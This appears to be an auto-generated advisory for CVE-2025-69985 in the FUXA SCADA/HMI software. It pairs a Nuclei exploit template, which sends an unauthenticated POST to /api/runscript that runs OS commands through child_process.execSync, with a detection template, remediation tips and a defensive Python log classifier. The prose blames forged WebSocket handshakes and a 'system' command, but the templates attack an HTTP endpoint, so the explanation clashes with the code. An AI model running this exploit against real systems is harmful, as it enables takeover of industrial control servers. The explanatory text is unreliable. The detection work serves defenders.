[webapps] FUXA 1.2.8 - Authentication Bypass + RCE Exploit
CVE-2025-69985
FUXA 1.2.8 contains an authentication bypass vulnerability that allows an unauthorized attacker to execute code remotely.
Critical · CVSS 9.8
📋 Basic Vulnerability Information
| CVE | CVE-2025-69985 |
|---|---|
| Vulnerability type | Authentication bypass + remote code execution |
| Affected versions | FUXA <= 1.2.8 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-30 |
| Submitted by | Joshua van der Poll (https://github.com/joshuavanderpoll/) |
| Source | Exploit-DB original |
🔬 Root Cause
The FUXA WebSocket service does not properly authenticate sessions. An attacker can bypass login by forging WebSocket requests and then use the built-in `system` command execution interface to achieve RCE.
🎯 Attack Scenario
1. The attacker sends a forged authentication handshake directly to FUXA's WebSocket port.
2. After bypassing authentication, the attacker crafts a JSON packet containing a `system` instruction to inject commands.
3. The server executes the attacker-specified operating system command, achieving remote code execution.
💥 Impact
An attacker can bypass authentication to gain control of the server and execute arbitrary operating system commands, leading to complete takeover of the service, data leakage, or further lateral movement inside the internal network.
⚔️ Nuclei Exploit Template
The following exploit template is in standard Nuclei v3 format and can be used directly to verify the vulnerability:
```yaml
id: CVE-2025-69985-exploit

info:
  name: FUXA <= 1.2.8 - Authentication Bypass + RCE Exploit
  author: nuclei-template-generator
  severity: critical
  description: |
    FUXA <= 1.2.8 is vulnerable to authentication bypass on the /api/runscript endpoint.
    An unauthenticated attacker can send a crafted JavaScript payload using
    child_process.execSync to achieve full remote command execution without authentication.
    CVE-2025-69985
  reference:
    - https://github.com/frangoteam/FUXA/tree/v1.2.8
    - https://github.com/joshuavanderpoll/CVE-2025-69985
  tags: cve,cve2025,fuxa,scada,auth-bypass,rce,exploit

variables:
  cmd: "id"

http:
  - raw:
      - |
        POST /api/runscript HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Referer: {{BaseURL}}/fuxa
        Connection: close

        {"params":{"script":{"parameters":[],"mode":"","id":"exploit","name":"exploit","code":"const cp = require(\"child_process\");\ntry {\n const result = cp.execSync(\"{{cmd}}\", { encoding: \"utf8\" });\n return result.toString();\n} catch (err) {\n return \"ERROR: \" + err.message + (err.stdout ? \"\\nSTDOUT: \" + err.stdout.toString() : \"\") + (err.stderr ? \"\\nSTDERR: \" + err.stderr.toString() : \"\");\n}","test":"const cp = require(\"child_process\");\ntry {\n const result = cp.execSync(\"{{cmd}}\", { encoding: \"utf8\" });\n return result.toString();\n} catch (err) {\n return \"ERROR: \" + err.message + (err.stdout ? \"\\nSTDOUT: \" + err.stdout.toString() : \"\") + (err.stderr ? \"\\nSTDERR: \" + err.stderr.toString() : \"\");\n}"},"toLogEvent":false}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "uid=[0-9]+\\([a-zA-Z0-9_-]+\\)\\s+gid=[0-9]+"
        part: body

    extractors:
      - type: regex
        name: rce-output
        part: body
        regex:
          - "uid=[0-9]+\\([^)]+\\)[^\n]*"
```
🔍 Nuclei Detection Template
The following detection template is used to determine whether a target is affected. Note that the second request's matcher only requires a 200 status and the character "2" somewhere in the body, so a hit on its own is a candidate to confirm, not proof; the exploit template's uid=/gid= regex is the stronger check.
```yaml
id: CVE-2025-69985-detection

info:
  name: FUXA <= 1.2.8 - Authentication Bypass Detection
  author: nuclei-template-generator
  severity: critical
  description: |
    Detects FUXA web-based SCADA/HMI software version <= 1.2.8 which is vulnerable to
    authentication bypass allowing unauthenticated access to the /api/runscript endpoint
    (CVE-2025-69985).
  reference:
    - https://github.com/frangoteam/FUXA/tree/v1.2.8
    - https://github.com/joshuavanderpoll/CVE-2025-69985
  tags: cve,cve2025,fuxa,scada,auth-bypass,detection

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
      - "{{BaseURL}}/fuxa"
      - "{{BaseURL}}/api/settings"
    stop-at-first-match: false
    matchers-condition: or
    matchers:
      - type: word
        name: fuxa-ui
        words:
          - "FUXA"
          - "fuxa"
          - "frangoteam"
        condition: or
        part: body
      - type: word
        name: fuxa-api
        words:
          - "\"version\""
          - "fuxa"
        condition: and
        part: body

  - method: POST
    path:
      - "{{BaseURL}}/api/runscript"
    headers:
      Content-Type: application/json
      Referer: "{{BaseURL}}/fuxa"
    body: |
      {"params":{"script":{"parameters":[],"mode":"","id":"probe","name":"probe","code":"return 1+1;","test":"return 1+1;"},"toLogEvent":false}}
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "2"
        part: body
        negative: false
    extractors:
      - type: regex
        name: runscript-response
        part: body
        regex:
          - ".*"
```
🛡️ Remediation
Upgrade to a FUXA version later than 1.2.8. As an interim measure, add token validation at the WebSocket handshake stage and restrict `system` command invocation by source IP or user role.
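Until the upgrade lands, defenders with a reverse proxy or WAF logging request bodies in front of FUXA can flag the traffic pattern the templates above produce. The following is an added example written for this advisory, not code from Exploit-DB or the FUXA project; the log record schema (`method`, `path`, `status`, `auth`, `body`) and the list of Node.js primitives treated as OS-escape indicators are assumptions, and the sample records are constructed.

```python
import json
import re
from typing import List, Optional

# Node.js primitives that let a /api/runscript script escape into the host OS; the public
# template relies on require("child_process") + execSync, so those are the core signal.
OS_ESCAPE = re.compile(
    r"""require\(\s*['"](child_process|fs|net|vm)['"]\s*\)|\b(execSync|execFileSync|spawnSync|exec|spawn)\s*\("""
)

def runscript_code(body: str) -> Optional[str]:
    """Return script.code plus script.test from a /api/runscript body, or None if not that shape."""
    try:
        script = json.loads(body)["params"]["script"]
        return "\n".join(str(script.get(k, "")) for k in ("code", "test"))
    except (ValueError, KeyError, TypeError, AttributeError):
        return None

def classify(rec: dict) -> List[str]:
    """Detection tags for one proxy log record (the record schema is an assumption)."""
    tags: List[str] = []
    if rec.get("method") != "POST" or rec.get("path", "").split("?", 1)[0] != "/api/runscript":
        return tags
    code = runscript_code(rec.get("body", ""))
    if code is None:
        return tags
    if not rec.get("auth"):                      # no session or user attached to the call
        tags.append("runscript-unauthenticated")
    if OS_ESCAPE.search(code):                   # child_process / execSync in the script body
        tags.append("runscript-os-command")
    if "runscript-unauthenticated" in tags and rec.get("status") == 200:
        tags.append("bypass-confirmed")          # server accepted the call without a session
    return tags

EXPLOIT_CODE = 'const cp = require("child_process");\nreturn cp.execSync("id", { encoding: "utf8" });'
def _rec(src: str, auth: str, code: str, sid: str) -> dict:
    """Constructed proxy log record for a POST /api/runscript call (not FUXA's own log format)."""
    return {"src": src, "method": "POST", "path": "/api/runscript", "status": 200, "auth": auth,
            "body": json.dumps({"params": {"script": {"parameters": [], "mode": "", "id": sid,
                                "name": sid, "code": code, "test": code}, "toLogEvent": False}})}

SAMPLE_LOG = [  # constructed records for the demo, not real traffic
    {"src": "10.0.0.5", "method": "GET", "path": "/fuxa", "status": 200, "auth": "ops", "body": ""},
    _rec("198.51.100.23", "", EXPLOIT_CODE, "exploit"),  # the advisory's payload, no session
    _rec("10.0.0.5", "ops", "return 1 + 2;", "s1"),      # legitimate authenticated script test
    _rec("198.51.100.23", "", "return 1+1;", "probe"),   # the detection template's probe, no session
]

def scan(records) -> List[tuple]:  # (src, path, tags) for every record that triggers a detection
    return [(r["src"], r["path"], tags) for r in records if (tags := classify(r))]
```

A `runscript-unauthenticated` hit on a patched build is the quickest sign the interim access restriction is not actually in front of the endpoint.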
📎 References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69985
- https://www.exploit-db.com/exploits/52039
- Exploit-DB original
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 05:40 | Source: Exploit-DB